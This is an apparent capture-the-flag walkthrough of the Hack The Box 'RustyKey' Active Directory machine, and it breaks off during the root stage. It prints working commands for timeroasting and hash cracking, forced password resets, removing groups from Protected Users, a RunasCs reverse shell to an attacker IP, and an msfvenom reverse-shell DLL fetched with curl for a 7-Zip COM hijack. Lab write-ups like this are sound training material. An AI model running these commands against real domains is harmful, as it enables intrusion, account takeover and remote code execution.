Reconnaissance

Scanning all the ports and their services using nmap

1
nmap -sCV -T5 --min-rate 2000 -v -oN rustykey.nmap -Pn 10.10.11.75

Results:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
Not shown: 985 closed tcp ports (reset)
PORT     STATE    SERVICE       REASON          VERSION
53/tcp   open     domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open     kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-11-11 01:35:46Z)
135/tcp  open     msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open     netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
366/tcp  filtered odmr          no-response
389/tcp  open     ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp  open     microsoft-ds? syn-ack ttl 127
464/tcp  open     kpasswd5?     syn-ack ttl 127
593/tcp  open     ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open     tcpwrapped    syn-ack ttl 127
2200/tcp filtered ici           no-response
3268/tcp open     ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp open     tcpwrapped    syn-ack ttl 127
3801/tcp filtered ibm-mgr       no-response
5985/tcp open     http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 51928/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 40036/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 63867/udp): CLEAN (Timeout)
|   Check 4 (port 13351/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 7h37m43s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-11-11T01:35:58
|_  start_date: N/A

Looks like the AD installed on this machine is most likely in default settings because it’s not showing all the SSL SMB information we normally see on other AD machines.

Using NetExec we confirm the Domain and the Host:

1
2
nxc smb 10.10.11.75  
SMB         10.10.11.75     445    dc               [*]  x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:None) (NTLM:False) 

dc = hostname of the Domain Controller

rustykey.htb = the Active Directory domain name

We can add those hosts to our /etc/hosts (add the below to the hosts file so our machine can communicate with it):

1
echo "10.10.11.75     dc.rustykey.htb rustykey.htb dc" | sudo tee -a /etc/hosts

In the machine information section we can see they have given us some credentials to start with:

rr.parker / 8#t5HE8L!W3A

Using the Credentials given by the HTB

1
2
3
nxc smb dc.rustykey.htb -u 'rr.parker' -p '8#t5HE8L!W3A'
SMB         10.10.11.75     445    dc               [*]  x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         10.10.11.75     445    dc               [-] rustykey.htb\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED 

STATUS_NOT_SUPPORTED coming from the KDC (when you try to authenticate against the DC) indicates the KDC refused to process the authentication request using the mechanism the client tried to use. Common causes in AD/SMB contexts:

• NTLM authentication is not allowed on the DC (your earlier scan showed NTLM:False). If your client tried to fall back to NTLM, the DC will reject it.

Since NTLM is disabled, we’ll use kerberos authentication to continue.

Before that we have to get the .krb5 file. We can use the netexec built in feature to do that:

1
2
3
4
5
nxc smb dc.rustykey.htb -u 'rr.parker' -p '8#t5HE8L!W3A'  --generate-krb5-file rustykey.krb5
SMB         10.10.11.75     445    dc               [*]  x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         10.10.11.75     445    dc               [+] krb5 conf saved to: rustykey.krb5
SMB         10.10.11.75     445    dc               [+] Run the following command to use the conf file: export KRB5_CONFIG=rustykey.krb5
SMB         10.10.11.75     445    dc               [-] rustykey.htb\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED 

To enable proper Kerberos communication between our Linux host and the Active Directory domain, replace the system Kerberos configuration with the one we generated for RustyKey:

1
sudo cp rustykey.krb5 /etc/krb5.conf

This installs the RustyKey Kerberos configuration at /etc/krb5.conf, allowing the system to use the AD KDC for authentication.

Now we can use kerberos authentication to see if the credentials are working we can do it by just adding -k to the netexec command:

1
2
3
nxc smb dc.rustykey.htb -u 'rr.parker' -p '8#t5HE8L!W3A' -k                                 
SMB         dc.rustykey.htb 445    dc               [*]  x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         dc.rustykey.htb 445    dc               [+] rustykey.htb\rr.parker:8#t5HE8L!W3A 

It works.

If you encounter KRB_AP_ERR_SKEW (time skew) errors, sync your clock with the domain controller:

1
sudo ntpdate -s dc.rustykey.htb

Kerberos requires closely matched system times, this error means your machine’s clock is out of sync with the AD KDC. Syncing the time against the domain controller resolves the mismatch and allows Kerberos authentication to proceed.

Now using these privileges we can do some enumeration on the users groups and walk the dog to get the AD juicy information (bloodhound).

Enumeration users

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
nxc smb dc.rustykey.htb -u 'rr.parker' -p '8#t5HE8L!W3A' -k --users
SMB         dc.rustykey.htb 445    dc               [*]  x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         dc.rustykey.htb 445    dc               [+] rustykey.htb\rr.parker:8#t5HE8L!W3A
SMB         dc.rustykey.htb 445    dc               -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         dc.rustykey.htb 445    dc               Administrator                 2025-06-04 22:52:22 0       Built-in account for administering the computer/domain
SMB         dc.rustykey.htb 445    dc               Guest                                      0       Built-in account for guest access to the computer/domain
SMB         dc.rustykey.htb 445    dc               krbtgt                        2024-12-27 00:53:40 0       Key Distribution Center Service Account
SMB         dc.rustykey.htb 445    dc               rr.parker                     2025-06-04 22:54:15 0
SMB         dc.rustykey.htb 445    dc               mm.turner                     2024-12-27 10:18:39 0
SMB         dc.rustykey.htb 445    dc               bb.morgan                     2025-11-11 02:16:40 0
SMB         dc.rustykey.htb 445    dc               gg.anderson                   2025-11-11 02:16:40 0
SMB         dc.rustykey.htb 445    dc               dd.ali                        2025-11-11 02:16:40 0
SMB         dc.rustykey.htb 445    dc               ee.reed                       2025-11-11 02:16:40 0
SMB         dc.rustykey.htb 445    dc               nn.marcos                     2024-12-27 11:34:50 0
SMB         dc.rustykey.htb 445    dc               backupadmin                   2024-12-30 00:30:18 0
SMB         dc.rustykey.htb 445    dc               [*] Enumerated 11 local users: RUSTYKEY

Grepping only the usernames:

1
2
3
4
5
6
7
8
9
10
11
12
13
awk '{print $5}' raw-users.list

Administrator
Guest
krbtgt
rr.parker
mm.turner
bb.morgan
gg.anderson
dd.ali
ee.reed
nn.marcos
backupadmin

Now Let’s Walk The Dog (bloodhound).

I’ll be using rusthound because it’s much faster and less buggy than the nxc builtin version and the bloodhound-python.

RustHound: https://github.com/NH-RED-TEAM/RustHound/

You can install rusthound by referring to this github repository:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
rusthound -d rustykey.htb -u 'rr.parker' -p '8#t5HE8L!W3A' --zip
---------------------------------------------------
Initializing RustHound at 08:07:43 on 11/11/25
Powered by g0h4n from OpenCyber
---------------------------------------------------

[2025-11-11T02:37:43Z INFO  rusthound] Verbosity level: Info
[2025-11-11T02:37:44Z INFO  rusthound::ldap] Connected to RUSTYKEY.HTB Active Directory!
[2025-11-11T02:37:44Z INFO  rusthound::ldap] Starting data collection...
[2025-11-11T02:37:49Z INFO  rusthound::ldap] All data collected for NamingContext DC=rustykey,DC=htb
[2025-11-11T02:37:49Z INFO  rusthound::json::parser] Starting the LDAP objects parsing...
[2025-11-11T02:37:49Z INFO  rusthound::json::parser] Parsing LDAP objects finished!
[2025-11-11T02:37:49Z INFO  rusthound::json::checker] Starting checker to replace some values...
[2025-11-11T02:37:49Z INFO  rusthound::json::checker] Checking and replacing some values finished!
[2025-11-11T02:37:49Z INFO  rusthound::json::maker] 12 users parsed!
[2025-11-11T02:37:49Z INFO  rusthound::json::maker] 66 groups parsed!
[2025-11-11T02:37:49Z INFO  rusthound::json::maker] 16 computers parsed!
[2025-11-11T02:37:49Z INFO  rusthound::json::maker] 10 ous parsed!
[2025-11-11T02:37:49Z INFO  rusthound::json::maker] 2 gpos parsed!
[2025-11-11T02:37:49Z INFO  rusthound::json::maker] 21 containers parsed!
[2025-11-11T02:37:49Z INFO  rusthound::json::maker] .//20251111080749_rustykey-htb_rusthound.zip created!

RustHound Enumeration Completed at 08:07:49 on 11/11/25! Happy Graphing!

Perfect now we have our collection zip:

1
2
3
4
ls -la
drwxrwxr-x  2 pwnedcake pwnedcake   4096 Nov 11 08:07 .
drwxrwxr-x 41 pwnedcake pwnedcake   4096 Nov 10 23:07 ..
-rw-rw-r--  1 pwnedcake pwnedcake 212885 Nov 11 08:07 20251111080749_rustykey-htb_rusthound.zip

We can now upload this collection to the bloodhound and get a greater view of how the AD is working and how we can escalate privileges using any of the misconfiguration we find.

Analyzing the data from the bloodhound

There wasn’t any kind of DACL abuse from the surface; the rr.parker user doesn’t have any kind of outbound connection to other users/groups.

rr.parker user information in BloodHound showing no significant privileges

But after cruising for a while in BloodHound, I found something very interesting.

There is a Organization Unit (OU) that has 5 computers in there:

Five computers discovered in the IT Organizational Unit

Since it’s very inconvenient for us to search each computer one by one, I added a Cypher query to display all the outbound connections from each computer:

1
2
3
4
MATCH (ou:OU {name: "COMPUTERS@RUSTYKEY.HTB"})
MATCH (ou)-[:Contains*1..]->(c:Computer)
MATCH p=(c)-[r]->(target)
RETURN p

Custom Cypher query showing outbound relationships from computers in the OU

And from that output I saw something very interesting which is that the IT_COMPUTER3 has AddSelf permissions to the HELPDESK Group.

If we can get hands on this IT-COMPUTER3 machine, we can impersonate it and add ourselves into the HELPDESK. If we can get HELPDESK, there is a clear attack path - we’ll have access to so many accounts:

HELPDESK group showing powerful privileges over multiple users

We have:

• ForceChangePassword - which allows changing the password of that user without any credentials
• AddMember on ProtectedObjects group
• GenericWrite over DD.ALI user

Those are some good findings for us to start working.

Now our main objective is to get our hands on that IT-COMPUTER3, to do that we need some kind of misconfiguration or some kind of vulnerability.

This is where we use Timeroasting.

Privilege Escalation to IT-COMPUTER3

Timeroasting

Before that, if we see the IT-COMPUTER3 object information, we can see that the user who’s in charge of that account has changed the password after the account was created, so it’s possible that the password of that computer is very weak:

IT-COMPUTER3 properties showing password was manually changed after creation

Now we can perform a timeroasting attack on this computer.

What is Timeroasting? (The Real Definition)

Timeroasting exploits Microsoft’s proprietary NTP (Network Time Protocol) authentication extension to extract password hashes for computer accounts by requesting authenticated time synchronization responses from Domain Controllers. This can be done without any credentials and the extracted hashes crack 10x faster than Kerberos TGS hashes.

• Targets computer accounts (machines ending with $)
• Exploits NTP time synchronization protocol
• Unauthenticated attack (no credentials needed!)
• Much faster to crack than traditional Kerberos hashes

Background - Why This Vulnerability Exists:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
Problem: Traditional NTP has no authentication
└─ Attacker could do MitM and change client's system time
└─ Wrong time = Kerberos breaks (time-sensitive protocol)

Microsoft's Solution: Authenticated NTP Extension
└─ Client sends NTP request with its RID (Relative Identifier)
└─ DC responds with time + MAC (Message Authentication Code)
└─ MAC is generated using: MD4(Computer Account Password)

The Vulnerability:
└─ Client doesn't need to authenticate to make this request!
└─ Anyone can request time sync for ANY RID
└─ DC responds with password hash-based MAC
└─ Effectively leaking salted password hashes!

Attack Flow:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Step 1: Send NTP Request to Domain Controller
└─ Include a RID (e.g., 1000, 1104, 1165, etc.)
└─ NO authentication required!

Step 2: DC Processes Request
└─ Looks up computer account with that RID
└─ Generates MAC using computer's password hash
└─ Sends back: Time + MAC (which includes hash material)

Step 3: Extract Hash
└─ Format: $sntp-ms$HASH$DATA...
└─ This is the salted password hash

Step 4: Crack Offline
└─ Use Hashcat mode 31300 (SNTP-MS)
└─ 10x faster than Kerberos TGS cracking!

Step 5: Profit
└─ Computer account password = Local admin on that machine
└─ Can authenticate as COMPUTERNAME$
└─ Lateral movement opportunity

Now we can initialize this attack.

You can get the timeroast script from the github:

Timeroast: https://github.com/SecuraBV/Timeroast

1
2
git clone https://github.com/SecuraBV/Timeroast
cd Timeroast

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
python3 timeroast.py dc.rustykey.htb               
1000:$sntp-ms$8b3bd52ac449208c900842197d9e66c1$1c0111e900000000000a026e4c4f434cecbd2cfcbae6984fe1b8428bffbfcd0aecbd3030feff1950ecbd3030feff35d5
1103:$sntp-ms$1cbc7150977c5feb27053410ebcc6b49$1c0111e900000000000a026e4c4f434cecbd2cfcbb71773be1b8428bffbfcd0aecbd30319b715c63ecbd30319b7184a7
1105:$sntp-ms$6f052026545652445db36317f88701f6$1c0111e900000000000a026e4c4f434cecbd2cfcbb86734ce1b8428bffbfcd0aecbd30319b865d7cecbd30319b867d5d
1104:$sntp-ms$59a6c4f9c2c8067655f192657a50513a$1c0111e900000000000a026e4c4f434cecbd2cfcbb72be63e1b8428bffbfcd0aecbd30319b72a030ecbd30319b72cf2a
1106:$sntp-ms$ff87416d292466868b5d1ab61ca49fc9$1c0111e900000000000a026e4c4f434cecbd2cfcbb8aed2ee1b8428bffbfcd0aecbd30319b8aaf1becbd30319b8afa9a
1107:$sntp-ms$b63445755f7064d2b1a192213c9e0f3a$1c0111e900000000000a026e4c4f434cecbd2cfcbb1fbe0be1b8428bffbfcd0aecbd30319f383f0becbd30319f385d3e
1118:$sntp-ms$338c364d456851f7342161fd0193d743$1c0111e900000000000a026e4c4f434cecbd2cfcb9205865e1b8428bffbfcd0aecbd3031b130a9ebecbd3031b130c81e
1119:$sntp-ms$8b1defecb8558aa7925950ac1ea4638c$1c0111e900000000000a026e4c4f434cecbd2cfcba2b1704e1b8428bffbfcd0aecbd3031b23b688becbd3031b23b81b6
1120:$sntp-ms$26a032d50cdc7f9bdaaa215f84daed30$1c0111e900000000000a026e4c4f434cecbd2cfcba2bef72e1b8428bffbfcd0aecbd3031b23c40f8ecbd3031b23c5d7e
1121:$sntp-ms$eb91e31cc63d848be2a35f1784c345fb$1c0111e900000000000a026e4c4f434cecbd2cfcb89c4bfbe1b8428bffbfcd0aecbd3031b4c532a4ecbd3031b4c54a21
1122:$sntp-ms$7e5e0da866c16c7b02c589cdfd72fed8$1c0111e900000000000a026e4c4f434cecbd2cfcb9d9dd56e1b8428bffbfcd0aecbd3031b602bef7ecbd3031b602ded7
1123:$sntp-ms$ac14c573ad957ad07ab2bc40c5d03d84$1c0111e900000000000a026e4c4f434cecbd2cfcb9dabe27e1b8428bffbfcd0aecbd3031b6039fc7ecbd3031b603bdfa
1124:$sntp-ms$3f78be175a7e56472c7e55eafe25b0c5$1c0111e900000000000a026e4c4f434cecbd2cfcbb1fbc5de1b8428bffbfcd0aecbd3031b7489aa3ecbd3031b748bf8c
1125:$sntp-ms$c175a486507a7d5bcaf34b07ca79a538$1c0111e900000000000a026e4c4f434cecbd2cfcb89cd3e0e1b8428bffbfcd0aecbd3031b89cc4c7ecbd3031b89cddf1
1126:$sntp-ms$00f87c4027c0ebec112d764c63c43e3b$1c0111e900000000000a026e4c4f434cecbd2cfcbb2f76e6e1b8428bffbfcd0aecbd3031bb2f661fecbd3031bb2f82a4
1127:$sntp-ms$32532db3912494cd375190f55435bec8$1c0111e900000000000a026e4c4f434cecbd2cfcb85b2c76e1b8428bffbfcd0aecbd3031bc73af24ecbd3031bc73cba9

Now we have to select the correct hash, you can see that object ID can be seen in the beginning of every hash we can check from bloodhound for the objectid of the IT-COMPUTER-3 and it is 1125.

We can save that hash and start cracking with hashcat.

Before running hashcat make sure to update hashcat to the latest version otherwise the hash mode we are going to use to crack these types of hashes will be not there you can simply upgrade the version using this command if you have installed hashcat using the apt package manager:

1
2
sudo apt-get update
sudo apt install --only-upgrade hashcat

1
echo '$sntp-ms$c175a486507a7d5bcaf34b07ca79a538$1c0111e900000000000a026e4c4f434cecbd2cfcb89cd3e0e1b8428bffbfcd0aecbd3031b89cc4c7ecbd3031b89cddf1' > it-3.hash

Then we can crack this hash:

1
hashcat -m 31300 it-3.hash /usr/share/wordlists/rockyou.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$sntp-ms$c175a486507a7d5bcaf34b07ca79a538$1c0111e900000000000a026e4c4f434cecbd2cfcb89cd3e0e1b8428bffbfcd0aecbd3031b89cc4c7ecbd3031b89cddf1:Rusty88!
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 31300 (MS SNTP)
Hash.Target......: $sntp-ms$c175a486507a7d5bcaf34b07ca79a538$1c0111e90...9cddf1
Time.Started.....: Tue Nov 11 09:27:02 2025 (8 secs)
Time.Estimated...: Tue Nov 11 09:27:10 2025 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:  1300.9 kH/s (1.08ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10670080/14344385 (74.39%)
Rejected.........: 0/10670080 (0.00%)
Restore.Point....: 10665984/14344385 (74.36%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: Ryanpenis -> RonaldoNathan
Hardware.Mon.#01.: Temp: 71c Util: 97%

Nice! We got the password as Rusty88!. Now we can perform that attack we saw in BloodHound :)

1. First we have AddSelf permissions to the HelpDesk Group:

IT-COMPUTER3 has AddSelf permission to the HELPDESK group

We can use bloodyAD to do this (alternatively we can use netrpc too):

1
2
bloodyAD --host dc.rustykey.htb -k -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' add groupMember HELPDESK 'IT-COMPUTER3$'
[+] IT-COMPUTER3$ added to HELPDESK

Successfully added IT-COMPUTER3$ to the HELPDESK group using bloodyAD

Now since we have control of the HELPDESK, we can start abusing other DACLs.

1. Second up we have ForceChangePassword:

HELPDESK group has ForceChangePassword over multiple users

We can use bloodyAD to do this too:

1
bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -k -u 'IT-COMPUTER3$' -p 'Rusty88!' set password "GG.ANDERSON" 'Pwnedcake@2025'

We can repeat this for all the other users now:

• GG.ANDERSON
• EE.REED
• BB.MORGAN
• DD.ALI

Changed passwords for all accessible users using bloodyAD

But there were some issues validating the credentials using netexec:

1
2
3
nxc smb dc.rustykey.htb -u 'BB.MORGAN' -p 'Pwnedcake@2025' -k
SMB         dc.rustykey.htb 445    dc               [*]  x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         dc.rustykey.htb 445    dc               [-] rustykey.htb\BB.MORGAN:Pwnedcake@2025 KDC_ERR_ETYPE_NOSUPP

KDC_ERR_ETYPE_NOSUPP

You can refer to this article about this error:

Boomi User Community - KDC_ERR_ETYPE_NOSUPP

This happens because the kerberos authentication using a different encryption for this. That means the weak encryptions are disabled for these, I guess some kind of protected users because earlier in the bloodhound we saw group called Protected Objects.

If you take one user and see its Member of section in the bloodhound we can see the users are in the Protected Objects group that is linking to the Protected Users:

Users are protected through the Protected Objects group linking to Protected Users

You can check with netexec too:

1
2
3
4
5
6
nxc ldap dc.rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -M groupmembership -o USER=bb.morgan -k
LDAP        dc.rustykey.htb 389    DC               [*] None (name:DC) (domain:rustykey.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc.rustykey.htb 389    DC               [+] rustykey.htb\IT-COMPUTER3$:Rusty88!
GROUPMEM... dc.rustykey.htb 389    DC               [+] User: bb.morgan is member of following groups:
GROUPMEM... dc.rustykey.htb 389    DC               IT
GROUPMEM... dc.rustykey.htb 389    DC               Domain Users

You can see that the bb.morgan is a member of the IT group.

If you look at the IT group carefully in the bloodhound you can see that the IT group is linked to the Protected Users group:

IT group is linked to Protected Users through Protected Objects

Since we have full control over the IT and HelpDesk groups, we can remove that Protected Objects object from the IT group.

We can utilize bloodyAD to do that:

1
2
bloodyAD --host dc.rustykey.htb -k -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' remove groupMember 'Protected Objects' 'IT'
[-] IT removed from Protected Objects

Nice! Now we can try and see if we can get access using Kerberos authentication:

Successfully authenticated as bb.morgan after removing Protected Objects

It worked! Now we can get a login to bb.morgan since he is a member of Remote Management Users.

Now we can get a login using a ticket:

1
2
3
getTGT.py 'rustykey.htb/bb.morgan@rustykey.htb:Pwnedcake@2025'
export KRB5CCNAME=bb.morgan@rustykey.htb.ccache
evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB

Successfully obtained shell as bb.morgan via Evil-WinRM

Now this is user flag.

Root

Now is the hard part (this required a lot of thinking to complete).

1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> ls

    Directory: C:\Users\bb.morgan\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         6/4/2025   9:15 AM           1976 internal.pdf
-ar---       11/10/2025   7:33 PM             34 user.txt

*Evil-WinRM* PS C:\Users\bb.morgan\Desktop>

We can see there’s a PDF file called internal.pdf - we can download it using the evil-winrm built-in download command.

Internal memo about Support group extended access for archiving utilities

According to this memo, the Support group now has extended access:

“As part of the new Support utilities rollout, extended access has been temporarily granted to allow testing and troubleshooting of file archiving features across shared workstations”

This hints at something interesting - earlier we had a user called EE.REED who is a member of the Support group. We can use that user to move forward.

And in that note:

A few notes:

• “Please avoid making unrelated changes to system components while this access is active.”
• “This permission change is logged and will be rolled back once the archiving utility is confirmed stable in all environments.”
• “Let DevOps know if you encounter access errors or missing shell actions.”

We can see it says ‘let devops know if you encounter access errors or missing shell actions’.

“Some newer systems handle context menu actions differently, so registry-level adjustments are expected during this phase.”

From the above information, we can see that it triggers shell actions automatically at certain points, and the above line indicates that registry-level adjustments are expected during this phase.

This suggests that “Registry-level adjustments” are related to an archiving utility, as it mentions compression/extraction and archiving tools.

Let the enumeration begin:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
*Evil-WinRM* PS C:\Program Files> dir

    Directory: C:\Program Files

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       12/26/2024   8:24 PM                7-Zip
d-----       12/26/2024   4:28 PM                Common Files
d-----        6/24/2025   9:59 AM                internet explorer
d-----        7/24/2025   1:09 AM                VMware
d-r---        5/30/2025   3:02 PM                Windows Defender
d-----        6/24/2025   9:59 AM                Windows Defender Advanced Threat Protection
d-----        11/5/2022  12:03 PM                Windows Mail
d-----         6/5/2025   7:54 AM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----        11/5/2022  12:03 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                Windows Security
d-----        9/15/2018  12:19 AM                WindowsPowerShell

*Evil-WinRM* PS C:\Program Files>

That memo was probably talking about 7-Zip because we can see it in the Program Files.

Short and sweet - This is pointing toward a DLL hijacking vulnerability with 7-Zip’s shell extension!

We can check for the registries for the 7-zip dll extension:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
*Evil-WinRM* PS C:\Program Files> reg query HKCR\CLSID /s /f "zip"

HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}
    (Default)    REG_SZ    7-Zip Shell Extension

HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
    (Default)    REG_SZ    C:\Program Files\7-Zip\7-zip.dll

HKEY_CLASSES_ROOT\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}
    (Default)    REG_SZ    Compressed (zipped) Folder SendTo Target
    FriendlyTypeName    REG_EXPAND_SZ    @%SystemRoot%\system32\zipfldr.dll,-10226

HKEY_CLASSES_ROOT\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}\DefaultIcon
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}\InProcServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{b8cdcb65-b1bf-4b42-9428-1dfdb7ee92af}
    (Default)    REG_SZ    Compressed (zipped) Folder Context Menu

HKEY_CLASSES_ROOT\CLSID\{b8cdcb65-b1bf-4b42-9428-1dfdb7ee92af}\InProcServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{BD472F60-27FA-11cf-B8B4-444553540000}
    (Default)    REG_SZ    Compressed (zipped) Folder Right Drag Handler

HKEY_CLASSES_ROOT\CLSID\{BD472F60-27FA-11cf-B8B4-444553540000}\InProcServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}\DefaultIcon
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}\InProcServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{ed9d80b9-d157-457b-9192-0e7280313bf0}
    (Default)    REG_SZ    Compressed (zipped) Folder DropHandler

HKEY_CLASSES_ROOT\CLSID\{ed9d80b9-d157-457b-9192-0e7280313bf0}\InProcServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

We found it:

1
2
HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
    (Default)    REG_SZ    C:\Program Files\7-Zip\7-zip.dll

The memo mentions the Support group has extended access for troubleshooting archiving features and registry-level adjustments.

Now we can get access to the user EE.REED to execute this attack. We can simulate the same steps that we did to get bb.morgan, except that we have to remove Protected Objects from the Support group - that’s the change we need to make:

1
2
3
bloodyAD --host dc.rustykey.htb -k -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' remove groupMember 'Protected Objects' 'SUPPORT'

[-] SUPPORT removed from Protected Objects

And change ee.reed’s password:

1
bloodyAD --host dc.rustykey.htb -d rustykey.htb -k -u 'IT-COMPUTER3$' -p 'Rusty88!' set password "EE.REED" 'Pwnedcake@2025'

But there is a login issue when trying to use the ee.reed’s account:

1
2
3
nxc smb dc.rustykey.htb -u 'ee.reed' -p 'Pwnedcake@2025' -k 
SMB         dc.rustykey.htb 445    dc               [*]  x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         dc.rustykey.htb 445    dc               [-] rustykey.htb\ee.reed:Pwnedcake@2025 STATUS_LOGON_TYPE_NOT_GRANTED 

There are some major restrictions blocking our login. What we can do is use bb.morgan’s shell to get a shell as ee.reed using the RunasCs technique :)

Upload RunasCs using evil-winrm:

1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\temp> upload RunasCs.exe

Info: Uploading /home/pwnedcake/hackthebox/Rustykey/tickets/RunasCs.exe to C:\temp\RunasCs.exe

Data: 68948 bytes of 68948 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\temp>

Start a listener in the attacker machine:

1
2
rlwrap nc -lvnp 56235                                       
listening on [any] 56235 ...

Now we can use RunasCs to get the shell:

1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\temp> .\RunasCs.exe EE.REED 'Pwnedcake@2025' powershell.exe -r 10.10.14.150:56235
[*] Warning: User profile directory for user EE.REED does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'EE.REED' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-104e72$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 1544 created in background.
*Evil-WinRM* PS C:\temp>

Remember you need to be quick otherwise this won’t work:

1
2
3
4
5
6
7
8
9
10
rlwrap nc -lvnp 56235                                       
listening on [any] 56235 ...
connect to [10.10.14.150] from (UNKNOWN) [10.10.11.75] 64600
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
rustykey\ee.reed
PS C:\Windows\system32> 

Since we now have access as ee.reed, we can use these privileges to overwrite the registry with a malicious DLL:

1
HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32

Create a malicious dll file using msfvenom and upload it to the host and overwrite the dll.

Generate malicious DLL:

1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.150 LPORT=45345 -f dll -o pwned.dll

Download the malicious dll and overwrite the registry to get the reverse shell:

1
2
3
4
5
PS C:\temp> curl 10.10.14.150/pwned.dll -o pwned.dll
